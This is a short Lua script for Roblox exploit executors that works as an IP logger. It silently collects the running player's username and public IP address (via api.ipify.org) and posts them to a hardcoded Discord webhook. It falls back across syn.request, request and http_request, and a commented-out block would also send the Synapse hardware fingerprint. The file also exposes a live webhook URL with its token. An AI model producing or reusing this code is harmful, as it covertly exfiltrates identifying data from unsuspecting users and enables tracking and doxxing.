local webh = "https://discord.com/api/webhooks/1209572405605965825/IN7nIqx5cRpZtffgqDsRcM7W1KJNQZMHWywW0wx49RyHBd5cg8UjxJx1DhR1W2COJsE3"

pcall(function()
   local data = {
       ["embeds"] = {
           {
               ["title"] = game:GetService("Players").LocalPlayer.Name,
               ["description"] = game:HttpGet("https://api.ipify.org")
           }
       }
   }

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)

--[[

--[[local req = syn.request({ Url = "https://httpbin.org/get" })
local parsed = game:GetService("HttpService"):JSONDecode(req.Body)

syn.request({
  Url = "https://discord.com/api/webhooks/1209572405605965825/IN7nIqx5cRpZtffgqDsRcM7W1KJNQZMHWywW0wx49RyHBd5cg8UjxJx1DhR1W2COJsE3",
  Method = "POST",
  Headers = {
      ["Content-Type"] = "application/json"
  },
  Body = game:GetService("HttpService"):JSONEncode({
      ["content"] = "Hardware ID: "..parsed.headers["Syn-Fingerprint"]
  })
})
